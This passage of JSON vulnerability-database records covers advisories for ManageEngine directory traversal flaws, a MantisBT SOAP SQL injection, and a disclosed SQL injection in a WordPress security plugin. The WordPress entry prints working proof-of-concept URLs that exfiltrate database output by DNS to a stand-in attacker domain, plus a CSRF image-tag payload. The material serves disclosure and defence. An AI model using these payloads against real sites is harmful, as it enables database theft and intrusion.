"CPAI-2014-1895", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-17T12:00:11", "description": "A directory traversal vulnerability exists in ManageEngine OpManager, Social IT Plus and IT360. The vulnerability is due to lack of authentication and insufficient input validation on parameters sent to \"/servlets/multipartRequest\" in HTTP requests. A remote unauthenticated attacker can delete arbitrary files in arbitrary locations on the server and execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.", "cvss3": {}, "published": "2014-10-20T00:00:00", "type": "checkpoint_advisories", "title": "ManageEngine Multiple Products multipartRequest Directory Traversal (CVE-2014-6036)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6036"], "modified": "2014-10-21T00:00:00", "id": "CPAI-2014-1916", "href": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-12-17T12:00:03", "description": "A directory traversal vulnerability exists in ManageEngine OpManager, Social IT Plus and IT360. The vulnerability is due to lack of authentication and insufficient input validation in HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations.", "cvss3": {}, "published": "2014-10-13T00:00:00", "type": "checkpoint_advisories", "title": "ManageEngine Multiple Products FileCollector Directory Traversal (CVE-2014-6035)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035"], "modified": "2014-10-28T00:00:00", "id": "CPAI-2014-1905", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T13:12:28", "description": "No description provided by source.", "published": "2014-09-29T00:00:00", "type": "seebug", "title": "Wordpress All In One WP Security Plugin 3.8.2 - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6242"], "modified": "2014-09-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87286", "id": "SSV:87286", "sourceData": "\n Advisory ID: HTB23231\r\nProduct: All In One WP Security WordPress plugin\r\nVendor: Tips and Tricks HQ, Peter, Ruhul, Ivy\r\nVulnerable Version(s): 3.8.2 and probably prior\r\nTested Version: 3.8.2\r\nAdvisory Publication: September 3, 2014 [without technical details]\r\nVendor Notification: September 3, 2014\r\nVendor Patch: September 12, 2014\r\nPublic Disclosure: September 24, 2014\r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-6242\r\nRisk Level: Medium\r\nCVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )\r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nAdvisory Details:\r\n \r\nHigh-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector.\r\n \r\n \r\n1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242\r\n \r\n1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "orderby" HTTP GET parameters to "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n \r\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "orderby" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n \r\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with an CSRF exploit, e.g.:\r\n \r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n \r\n \r\n1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "order" HTTP GET parameters to "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n \r\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "order" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):\r\n \r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n \r\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with CSRF exploit, e.g.:\r\n \r\n<img src="http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29">\r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nSolution:\r\n \r\nUpdate to All In One WP Security 3.8.3\r\n \r\nMore Information:\r\nhttps://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/\r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nReferences:\r\n \r\n[1] High-Tech Bridge Advisory HTB23231 - https://www.htbridge.com/advisory/HTB23231 - Two SQL Injections in All In One WP Security WordPress plugin.\r\n[2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\r\n \r\n-----------------------------------------------------------------------------------------------\r\n \r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87286", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T17:30:10", "description": "BUGTRAQ ID: 65445\r\nCVE ID: CVE-2014-1608\r\n\r\nMantisBT\u662f\u57fa\u4e8eWeb\u7684bug\u8ddf\u8e2a\u7cfb\u7edf\u3002\r\n\r\nMantisBT 1.2.16\u4e4b\u524d\u7248\u672c\uff0capi/soap/mc_file_api.php\u5185\u7684mci_file_get\u51fd\u6570\u5b58\u5728SQL\u6ce8\u5165\u6f0f\u6d1e\uff0c\u8fd9\u53ef\u4f7f\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7mc_issue_attachment_get SOAP\u8bf7\u6c42\u5185\u7684\u7279\u5236envelope\u6807\u7b7e\uff0c\u5229\u7528\u6b64\u6f0f\u6d1e\u6267\u884c\u4efb\u610fSQL\u547d\u4ee4\u3002\n0\nmantisbt mantisbt < 1.2.16\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.mantisbt.org/", "cvss3": {}, "published": "2014-03-19T00:00:00", "title": "MantisBT 'mc_issue_attachment_get' SOAP API SQL\u6ce8\u5165\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-1608"], "modified": "2014-03-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61854", "id": "SSV:61854", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}